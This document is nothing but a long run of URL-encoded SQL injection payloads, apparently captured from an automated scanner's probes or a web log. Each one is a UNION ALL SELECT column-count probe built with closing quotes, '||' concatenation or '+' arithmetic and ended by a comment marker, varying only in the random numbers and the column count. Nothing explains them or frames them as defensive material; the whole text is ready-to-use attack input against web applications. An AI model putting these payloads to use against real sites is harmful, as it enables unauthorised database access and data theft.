-7434%27%20WHERE%206245%3D6245%20UNION%20ALL%20SELECT%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245--%20 -2970%27%20WHERE%205719%3D5719%20UNION%20ALL%20SELECT%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719%2C%205719--%20 -7326%27%20WHERE%203615%3D3615%20UNION%20ALL%20SELECT%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615--%20 -9251%27%20WHERE%207491%3D7491%20UNION%20ALL%20SELECT%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491%2C%207491--%20 -8737%27%20WHERE%202340%3D2340%20UNION%20ALL%20SELECT%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340%2C%202340--%20 -8703%27%20WHERE%203569%3D3569%20UNION%20ALL%20SELECT%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569%2C%203569--%20 -1723%27%20WHERE%206888%3D6888%20UNION%20ALL%20SELECT%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888%2C%206888--%20 -5133%22%20WHERE%203758%3D3758%20UNION%20ALL%20SELECT%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758--%20 -8832%22%20WHERE%207407%3D7407%20UNION%20ALL%20SELECT%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407--%20 -6859%22%20WHERE%206323%3D6323%20UNION%20ALL%20SELECT%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323--%20 -4366%22%20WHERE%208404%3D8404%20UNION%20ALL%20SELECT%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404%2C%208404--%20 -9480%22%20WHERE%203705%3D3705%20UNION%20ALL%20SELECT%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705%2C%203705--%20 -5193%22%20WHERE%202440%3D2440%20UNION%20ALL%20SELECT%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440--%20 -8864%22%20WHERE%209581%3D9581%20UNION%20ALL%20SELECT%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581--%20 -7563%22%20WHERE%209451%3D9451%20UNION%20ALL%20SELECT%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451--%20 -2613%22%20WHERE%206880%3D6880%20UNION%20ALL%20SELECT%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880--%20 -7219%22%20WHERE%201491%3D1491%20UNION%20ALL%20SELECT%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491--%20 -2462%27%20%7C%7C%20%28SELECT%204429%20FROM%20DUAL%20WHERE%207388%3D7388%20UNION%20ALL%20SELECT%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388%2C%207388--%20%20%29%20%7C%7C%20%27 -4180%27%20%7C%7C%20%28SELECT%206933%20FROM%20DUAL%20WHERE%202964%3D2964%20UNION%20ALL%20SELECT%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964%2C%202964--%20%20%29%20%7C%7C%20%27 -4240%27%20%7C%7C%20%28SELECT%208684%20FROM%20DUAL%20WHERE%205826%3D5826%20UNION%20ALL%20SELECT%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826--%20%20%29%20%7C%7C%20%27 -6913%27%20%7C%7C%20%28SELECT%202748%20FROM%20DUAL%20WHERE%209887%3D9887%20UNION%20ALL%20SELECT%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887%2C%209887--%20%20%29%20%7C%7C%20%27 -1917%27%20%7C%7C%20%28SELECT%204299%20FROM%20DUAL%20WHERE%202795%3D2795%20UNION%20ALL%20SELECT%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795%2C%202795--%20%20%29%20%7C%7C%20%27 -1951%27%20%7C%7C%20%28SELECT%202602%20FROM%20DUAL%20WHERE%207608%3D7608%20UNION%20ALL%20SELECT%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608--%20%20%29%20%7C%7C%20%27 -2188%27%20%7C%7C%20%28SELECT%208150%20FROM%20DUAL%20WHERE%207650%3D7650%20UNION%20ALL%20SELECT%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650%2C%207650--%20%20%29%20%7C%7C%20%27 -8831%27%20%7C%7C%20%28SELECT%204296%20FROM%20DUAL%20WHERE%204320%3D4320%20UNION%20ALL%20SELECT%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320--%20%20%29%20%7C%7C%20%27 -6559%27%20%7C%7C%20%28SELECT%208396%20FROM%20DUAL%20WHERE%204516%3D4516%20UNION%20ALL%20SELECT%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516%2C%204516--%20%20%29%20%7C%7C%20%27 -9403%27%20%7C%7C%20%28SELECT%208889%20FROM%20DUAL%20WHERE%208500%3D8500%20UNION%20ALL%20SELECT%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500--%20%20%29%20%7C%7C%20%27 -4174%27%20%7C%7C%20%28SELECT%201420%20WHERE%203787%3D3787%20UNION%20ALL%20SELECT%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787--%20%20%29%20%7C%7C%20%27 -5605%27%20%7C%7C%20%28SELECT%203412%20WHERE%207836%3D7836%20UNION%20ALL%20SELECT%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836%2C%207836--%20%20%29%20%7C%7C%20%27 -1534%27%20%7C%7C%20%28SELECT%203289%20WHERE%208193%3D8193%20UNION%20ALL%20SELECT%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193--%20%20%29%20%7C%7C%20%27 -7849%27%20%7C%7C%20%28SELECT%201729%20WHERE%209257%3D9257%20UNION%20ALL%20SELECT%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257%2C%209257--%20%20%29%20%7C%7C%20%27 -9263%27%20%7C%7C%20%28SELECT%204115%20WHERE%208593%3D8593%20UNION%20ALL%20SELECT%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593%2C%208593--%20%20%29%20%7C%7C%20%27 -2357%27%20%7C%7C%20%28SELECT%206767%20WHERE%202653%3D2653%20UNION%20ALL%20SELECT%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653--%20%20%29%20%7C%7C%20%27 -8723%27%20%7C%7C%20%28SELECT%204218%20WHERE%205082%3D5082%20UNION%20ALL%20SELECT%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082%2C%205082--%20%20%29%20%7C%7C%20%27 -3641%27%20%7C%7C%20%28SELECT%204529%20WHERE%208465%3D8465%20UNION%20ALL%20SELECT%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465%2C%208465--%20%20%29%20%7C%7C%20%27 -5651%27%20%7C%7C%20%28SELECT%202405%20WHERE%207138%3D7138%20UNION%20ALL%20SELECT%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138%2C%207138--%20%20%29%20%7C%7C%20%27 -3935%27%20%7C%7C%20%28SELECT%205824%20WHERE%203378%3D3378%20UNION%20ALL%20SELECT%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378--%20%20%29%20%7C%7C%20%27 -3010%20%2B%20%28SELECT%202726%20FROM%20DUAL%20WHERE%205044%3D5044%20UNION%20ALL%20SELECT%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044--%20%20%29 -5695%20%2B%20%28SELECT%202179%20FROM%20DUAL%20WHERE%202288%3D2288%20UNION%20ALL%20SELECT%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288%2C%202288--%20%20%29 -6024%20%2B%20%28SELECT%208881%20FROM%20DUAL%20WHERE%208115%3D8115%20UNION%20ALL%20SELECT%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115%2C%208115--%20%20%29 -7774%20%2B%20%28SELECT%207480%20FROM%20DUAL%20WHERE%202020%3D2020%20UNION%20ALL%20SELECT%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020%2C%202020--%20%20%29 -9869%20%2B%20%28SELECT%207202%20FROM%20DUAL%20WHERE%201939%3D1939%20UNION%20ALL%20SELECT%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939--%20%20%29 -8573%20%2B%20%28SELECT%204443%20FROM%20DUAL%20WHERE%201990%3D1990%20UNION%20ALL%20SELECT%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990--%20%20%29 -2624%20%2B%20%28SELECT%209176%20FROM%20DUAL%20WHERE%202955%3D2955%20UNION%20ALL%20SELECT%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955%2C%202955--%20%20%29 -3322%20%2B%20%28SELECT%202987%20FROM%20DUAL%20WHERE%204020%3D4020%20UNION%20ALL%20SELECT%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020%2C%204020--%20%20%29 -9597%20%2B%20%28SELECT%203177%20FROM%20DUAL%20WHERE%207366%3D7366%20UNION%20ALL%20SELECT%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366%2C%207366--%20%20%29 -3063%20%2B%20%28SELECT%203690%20FROM%20DUAL%20WHERE%209808%3D9808%20UNION%20ALL%20SELECT%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808--%20%20%29 -6952%20%2B%20%28SELECT%204106%20WHERE%201578%3D1578%20UNION%20ALL%20SELECT%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578%2C%201578--%20%20%29 -6884%20%2B%20%28SELECT%207717%20WHERE%206179%3D6179%20UNION%20ALL%20SELECT%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179--%20%20%29 -6747%20%2B%20%28SELECT%208294%20WHERE%205075%3D5075%20UNION%20ALL%20SELECT%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075--%20%20%29 -7740%20%2B%20%28SELECT%205104%20WHERE%204069%3D4069%20UNION%20ALL%20SELECT%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069--%20%20%29 -4412%20%2B%20%28SELECT%203399%20WHERE%205535%3D5535%20UNION%20ALL%20SELECT%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535%2C%205535--%20%20%29 -2868%20%2B%20%28SELECT%207123%20WHERE%202388%3D2388%20UNION%20ALL%20SELECT%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388--%20%20%29 -8135%20%2B%20%28SELECT%209855%20WHERE%202872%3D2872%20UNION%20ALL%20SELECT%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872%2C%202872--%20%20%29 -3147%20%2B%20%28SELECT%204134%20WHERE%202364%3D2364%20UNION%20ALL%20SELECT%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364%2C%202364--%20%20%29 